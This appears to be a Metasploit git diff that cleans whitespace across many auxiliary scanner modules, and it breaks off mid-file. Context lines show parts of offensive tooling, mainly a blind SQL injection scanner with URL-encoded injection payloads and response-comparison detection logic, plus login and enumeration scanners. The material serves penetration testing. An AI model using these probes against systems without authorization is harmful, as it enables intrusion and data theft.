-54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary @probes << 'probe_pkt_citrix' @probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_nq' - + end def setup @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary # Fingerprint a single host def run_batch(batch) @results = {} - + print_status("Sending #{@probes.length} probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)") begin @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Auxiliary @results.each_key do |k| next if not @results[k].respond_to?('keys') data = @results[k] - + next unless inside_workspace_boundary?(data[:host]) - + conf = { :host => data[:host], :port => data[:port], @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary :name => data[:app], :info => data[:info] } - + if data[:hname] conf[:host_name] = data[:hname].downcase end @@ -161,11 +161,11 @@ class Metasploit3 < Msf::Auxiliary if data[:mac] conf[:mac] = data[:mac].downcase end - + report_service(conf) print_status("Discovered #{data[:app]} on #{k} (#{data[:info]})") end - + end @@ -189,8 +189,7 @@ class Metasploit3 < Msf::Auxiliary inf = '' maddr = nil hname = nil - - + # Work with protocols that return different data in different packets # These are reported at the end of the scanning loop to build state case pkt[2] @@ -198,21 +197,21 @@ class Metasploit3 < Msf::Auxiliary @results[hkey] ||= {} data = @results[hkey] - + data[:app] = "pcAnywhere" data[:port] = pkt[2] data[:host] = pkt[1] case pkt[0] - + when /^NR(........................)(........)/ name = $1.dup - caps = $2.dup + caps = $2.dup name = name.gsub(/_+$/, '').gsub("\x00", '').strip caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip data[:name] = name data[:caps] = caps - + when /^ST(.+)/ buff = $1.dup stat = 'Unknown' @@ -224,14 +223,14 @@ class Metasploit3 < Msf::Auxiliary if buff[2,1].unpack("C")[0] == 11 stat = "Busy" end - + data[:stat] = stat end - + if data[:name] inf << "Name: #{data[:name]} " end - + if data[:stat] inf << "- #{data[:stat]} " end @@ -239,9 +238,9 @@ class Metasploit3 < Msf::Auxiliary if data[:caps] inf << "( #{data[:caps]} ) " end - data[:info] = inf + data[:info] = inf end - + # Ignore duplicates return if @results[hkey] @@ -260,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary ver = pkt[0].unpack('H*')[0] if not ver inf = ver if ver - + @results[hkey] = true when 137 @@ -306,7 +305,7 @@ class Metasploit3 < Msf::Auxiliary hname = names[0][0] end end - + @results[hkey] = true when 111 @@ -328,7 +327,7 @@ class Metasploit3 < Msf::Auxiliary ) end inf = svc.join(", ") - + @results[hkey] = true when 123 @@ -340,7 +339,7 @@ class Metasploit3 < Msf::Auxiliary ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/) ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/) inf = ver if ver - + @results[hkey] = true when 1434 @@ -350,7 +349,7 @@ class Metasploit3 < Msf::Auxiliary } @results[hkey] = true - + when 161 app = 'SNMP' asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil @@ -368,7 +367,7 @@ class Metasploit3 < Msf::Auxiliary inf = snmp_info com = snmp_comm - @results[hkey] = true + @results[hkey] = true when 5093 app = 'Sentinel' @@ -382,7 +381,7 @@ class Metasploit3 < Msf::Auxiliary when 1604 app = 'citrix-ica' return unless citrix_parse(pkt[0]) - @results[hkey] = true + @results[hkey] = true end @@ -547,14 +546,13 @@ class Metasploit3 < Msf::Auxiliary "\x00\x00\x00\x00" return [data, 1604] end - + def probe_pkt_pca_st(ip) return ["ST", 5632] end - + def probe_pkt_pca_nq(ip) return ["NQ", 5632] - end + end end - diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 26e572cc57..0dd756de27 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -190,4 +190,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index fc3828ea17..78ac32a09e 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -53,4 +53,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index ffe2a1882c..f35b7335c4 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp']), + OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp']) ], self.class) end diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index 49ca8d8fa3..32e7ba0047 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary "'%20OR%20'#{rnum}'%3D'#{rnum+1}'--" ] ] - + # Creating strings with true and false values valstr = [] inivalstr.each do |vstr| @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary # With false values, appending '0' to real value valstr << ['False num '+vstr[0],'0'+vstr[1],'0'+vstr[2]] end - + #valstr.each do |v| # print_status("#{v[0]}") # print_status("#{v[1]}") @@ -130,13 +130,13 @@ class Metasploit3 < Msf::Auxiliary end verifynr=2 - + i=0 k=0 c=0 - + normalres = nil - + verifynr.times do |j| #SEND NORMAL REQUEST begin @@ -162,19 +162,19 @@ class Metasploit3 < Msf::Auxiliary else if k != normalres.body.length print_error("Normal response body vary") - return + return end if c != normalres.code.to_i print_error("Normal response code vary") - return + return end end end end - + print_status("[Normal response body: #{k} code: #{c}]") - pinj = false + pinj = false valstr.each do |tarr| #QUERY @@ -186,7 +186,7 @@ class Metasploit3 < Msf::Auxiliary testgvars = queryparse(datastore['QUERY']) #Now its a Hash testgvars[key] = testgvars[key]+tarr[1] t = testgvars[key] - + begin trueres = send_request_cgi({ 'uri' => datastore['PATH'], @@ -199,11 +199,11 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end - + #SEND FALSE REQUEST testgvars = queryparse(datastore['QUERY']) #Now its a Hash testgvars[key] = testgvars[key]+tarr[2] - + begin falseres = send_request_cgi({ 'uri' => datastore['PATH'], @@ -215,22 +215,22 @@ class Metasploit3 < Msf::Auxiliary }, 20) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE - end - + end + pinja = false pinjb = false pinjc = false pinjd = false - + pinja = detection_a(normalres,trueres,falseres,tarr) pinjb = detection_b(normalres,trueres,falseres,tarr) pinjc = detection_c(normalres,trueres,falseres,tarr) pinjd = detection_d(normalres,trueres,falseres,tarr) - + if pinja or pinjb or pinjc or pinjd print_error("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") print_error("[#{t}]") - + report_web_vuln( :host => ip, :port => rport, @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Auxiliary end end end - + #DATA if pvars pvars.each do |key,value| @@ -282,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end - + #SEND FALSE REQUEST testpvars = queryparse(datastore['DATA']) #Now its a Hash testpvars[key] = testpvars[key]+tarr[2] @@ -312,16 +312,16 @@ class Metasploit3 < Msf::Auxiliary pinjb = false pinjc = false pinjd = false - + pinja = detection_a(normalres,trueres,falseres,tarr) pinjb = detection_b(normalres,trueres,falseres,tarr) pinjc = detection_c(normalres,trueres,falseres,tarr) pinjd = detection_d(normalres,trueres,falseres,tarr) - + if pinja or pinjb or pinjc or pinjd print_error("Possible #{tarr[0]} Blind SQL Injection Found #{datastore['PATH']} #{key}") print_error("[#{t}]") - + report_web_vuln( :host => ip, :port => rport, @@ -344,26 +344,26 @@ class Metasploit3 < Msf::Auxiliary end end end - + def detection_a(normalr,truer,falser,tarr) # print_status("A") - + # DETECTION A # Very simple way to compare responses, this can be improved alot , at this time just the simple way - + if normalr and truer #Very simple way to compare responses, this can be improved alot , at this time just the simple way reltruesize = truer.body.length-(truer.body.scan(/#{tarr[1]}/).length*tarr[1].length) normalsize = normalr.body.length - + #print_status("normalsize #{normalsize} truesize #{reltruesize}") - + if reltruesize == normalsize if falser relfalsesize = falser.body.length-(falser.body.scan(/#{tarr[2]}/).length*tarr[2].length) - #print_status("falsesize #{relfalsesize}") - + #print_status("falsesize #{relfalsesize}") + if reltruesize > relfalsesize print_status("Detected by test A") return true @@ -379,20 +379,20 @@ class Metasploit3 < Msf::Auxiliary else print_status("No response.") end - + return false end - + def detection_b(normalr,truer,falser,tarr) # print_status("B") - + # DETECTION B # Variance on res body - - if normalr and truer + + if normalr and truer if falser #print_status("N: #{normalr.body.length} T: #{truer.body.length} F: #{falser.body.length} T1: #{tarr[1].length} F2: #{tarr[2].length} #{tarr[1].length+tarr[2].length}") - + if (truer.body.length-tarr[1].length) != normalr.body.length and (falser.body.length-tarr[2].length) == normalr.body.length print_status("Detected by test B") return true @@ -403,17 +403,17 @@ class Metasploit3 < Msf::Auxiliary end end end - + return false end - + def detection_c(normalr,truer,falser,tarr) # print_status("C") - + # DETECTION C # Variance on res code of true or false statements - - if normalr and truer + + if normalr and truer if falser if truer.code.to_i != normalr.code.to_i and falser.code.to_i == normalr.code.to_i print_status("Detected by test C") @@ -425,26 +425,26 @@ class Metasploit3 < Msf::Auxiliary end end end - + return false end - + def detection_d(normalr,truer,falser,tarr) # print_status("D") - + # DETECTION D # Variance PERCENTAGE MIN MAX on res body - + # 2% 50% - max_diff_perc = 2 - min_diff_perc = 50 - - if normalr and truer + max_diff_perc = 2 + min_diff_perc = 50 + + if normalr and truer if falser nl= normalr.body.length tl= truer.body.length fl= falser.body.length - + if nl == 0 nl = 1 end @@ -454,30 +454,30 @@ class Metasploit3 < Msf::Auxiliary if fl == 0 fl = 1 end - + ntmax = [ nl,tl ].max ntmin = [ nl,tl ].min diff_nt_perc = ((ntmax - ntmin)*100)/(ntmax) - diff_nt_f_perc = ((ntmax - fl)*100)/(ntmax) - + diff_nt_f_perc = ((ntmax - fl)*100)/(ntmax) + if diff_nt_perc <= max_diff_perc and diff_nt_f_perc > min_diff_perc print_status("Detected by test D") return true end - + nfmax = [ nl,fl ].max nfmin = [ nl,fl ].min diff_nf_perc = ((nfmax - nfmin)*100)/(nfmax) diff_nf_t_perc = ((nfmax - tl)*100)/(nfmax) - + if diff_nf_perc <= max_diff_perc and diff_nf_t_perc > min_diff_perc print_status("Detected by test D") return true end end end - + return false end - + end diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index c20429545a..731f417f92 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -199,4 +199,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 9c0d0f87e0..a7f87975ef 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -100,4 +100,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index fd75b96cbc..35e78cf958 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -97,4 +97,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index d6afc32d87..4151516404 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -214,4 +214,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index a90bd1fb65..9dd9721ade 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Auxiliary :data => "#{tpath}#{testfdir} Auth: #{res.headers['WWW-Authenticate']}", :update => :unique_data ) - + end end @@ -188,4 +188,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index e926ae5329..8807574ab8 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary :data => "#{tpath}%c0%af#{testfdir} Code: #{res.code}", :update => :unique_data ) - + end end @@ -195,4 +195,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index bce224393a..ae6a4119ba 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('PATH', [true, "Drupal Path", "/"]), + OptString.new('PATH', [true, "Drupal Path", "/"]) ], self.class) end diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 12c79caa2a..7ae3c9ed88 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary print_error("[#{wmap_target_host}] Error string appears in the normal response, unable to test") print_error("[#{wmap_target_host}] Error string: '#{inje}'") print_error("[#{wmap_target_host}] DB TYPE: #{dbt}, Error type '#{injt}'") - + report_web_vuln( :host => ip, :port => rport, diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 2a2195503c..3642572ef3 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -303,7 +303,7 @@ class Metasploit3 < Msf::Auxiliary return :abort if (res.code == 404) - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) + if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) if ((res.code == 201) and (requesttype == "PUT")) print_good("Trying to delete #{path}") del_res,c = send_digest_request_cgi({ @@ -334,4 +334,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index 8900210fc4..d96c9db27a 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -134,7 +134,7 @@ class Metasploit4 < Msf::Auxiliary path += '/' end - path += datastore['FILENAME'] + path += datastore['FILENAME'] case action.name when 'PUT' diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 4f2d1c713e..079ee80053 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + register_wmap_options({ 'OrderID' => 0, 'Require' => {}, @@ -46,4 +46,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/impersonate_ssl.rb b/modules/auxiliary/scanner/http/impersonate_ssl.rb index 12e823482a..3ab573dbb1 100644 --- a/modules/auxiliary/scanner/http/impersonate_ssl.rb +++ b/modules/auxiliary/scanner/http/impersonate_ssl.rb @@ -180,4 +180,4 @@ class Metasploit4 < Msf::Auxiliary print_good("pem: #{p}") end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8a84683aa6..f8afd7abc8 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -124,4 +124,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 10e21050bf..785ad753d9 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary register_wmap_options({ 'OrderID' => 1, 'Require' => {}, - }) + }) end def run_host(target_host) @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary datastore['RPORT'] = target_port if target_host == site print_error("Target is the same as proxy site.") - else + else check_host(target_host,target_port,site,user_agent) end end diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index c3e2166036..a041d2488b 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -80,4 +80,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 7a0ad12426..6e39c2cccf 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Auxiliary end end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index c830d35414..e276f7110f 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -92,4 +92,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index d56958c23d..24645d8e8f 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -112,4 +112,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 9bfcd847ae..d96026e52c 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary result.each do |u| print_status("[#{target_host}] #{tpath} [#{u}]") - + report_web_vuln( :host => target_host, :port => rport, @@ -92,4 +92,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/sockso_traversal.rb b/modules/auxiliary/scanner/http/sockso_traversal.rb index fd8e222930..a4fa382649 100644 --- a/modules/auxiliary/scanner/http/sockso_traversal.rb +++ b/modules/auxiliary/scanner/http/sockso_traversal.rb @@ -73,4 +73,4 @@ class Metasploit3 < Msf::Auxiliary print_status("File saved in: #{path}") end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/sqlmap.rb b/modules/auxiliary/scanner/http/sqlmap.rb index 0f96276b85..70722f8cf6 100644 --- a/modules/auxiliary/scanner/http/sqlmap.rb +++ b/modules/auxiliary/scanner/http/sqlmap.rb @@ -109,4 +109,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index 3a87cb9b87..b4bdda636c 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -119,4 +119,4 @@ class Metasploit4 < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 160af13fa8..3d530ce18a 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -250,4 +250,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb index c16993e687..a88841ae86 100644 --- a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb +++ b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb @@ -109,4 +109,4 @@ HTTP/1.1 405 Method Not Allowed Allow: GET Content-Length: 0 Server: Jetty(EAServer/6.3.1.04 Build 63104 EBF 18509) -=end \ No newline at end of file +=end diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index bfec8d7e32..55c31af0dd 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -67,4 +67,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 2216520b77..7d1e1dc37f 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -84,9 +84,9 @@ class Metasploit3 < Msf::Auxiliary print_status("Testing verb #{tv} resp code: [#{resauth.code}]") if resauth.code != auth_code and resauth.code <= 302 print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}") - + # Unable to use report_web_vuln as method is not in list of allowed methods. - + report_note( :host => ip, :proto => 'tcp', @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary :data => "#{datastore['PATH']} Verb: #{tv}", :update => :unique_data ) - + end end end diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 69319b37de..e7209ff70b 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -147,4 +147,3 @@ require 'cgi' end end - diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 918115b4a3..d3314cb018 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - + # Modify to true if you have sqlmap installed. def wmap_enabled false @@ -189,4 +189,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index d634203fba..cd7ebb7de7 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -78,4 +78,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 088dd6024b..9d1deacf9a 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -79,4 +79,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index dddca526f1..568414908b 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -78,4 +78,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index cf16e5fa3b..63351acf08 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -182,4 +182,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 98e973eac5..81e7c75515 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -260,5 +260,3 @@ class Metasploit3 < Msf::Auxiliary print_status("Done.") end end - - diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index a77527a107..b3de6171cd 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -40,4 +40,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index 4a2091548e..b62af0c634 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -84,4 +84,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index ab766f7cb8..2654af51a0 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'OKI Printer Default Login Credential Scanner', 'Description' => %q{ This module scans for OKI printers via SNMP, then tries to connect to found devices - with vendor default administrator credentials via HTTP authentication. By default, OKI + with vendor default administrator credentials via HTTP authentication. By default, OKI network printers use the last six digits of the MAC as admin password. }, 'Author' => 'antr6X ', diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 2d49215c11..b9074bd81a 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -116,4 +116,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index a41e52dfad..462685ac2b 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -78,4 +78,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index a911866b57..8cbe995b12 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -129,4 +129,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 5c813442b2..df31b12700 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -139,4 +139,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index 0a541551f4..f510a64862 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -82,4 +82,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index d9fa88e002..dbfb01338f 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -317,4 +317,3 @@ class Metasploit3 < Msf::Auxiliary return data end end - diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index 61bc749393..84680d406e 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -304,4 +304,3 @@ class Metasploit3 < Msf::Auxiliary return data end end - diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index 03ab8b555c..d5265eebea 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -87,4 +87,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index 0850fe1694..4df4e02ae1 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -187,4 +187,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 2624e990f9..5abfb3f68c 100644 --- 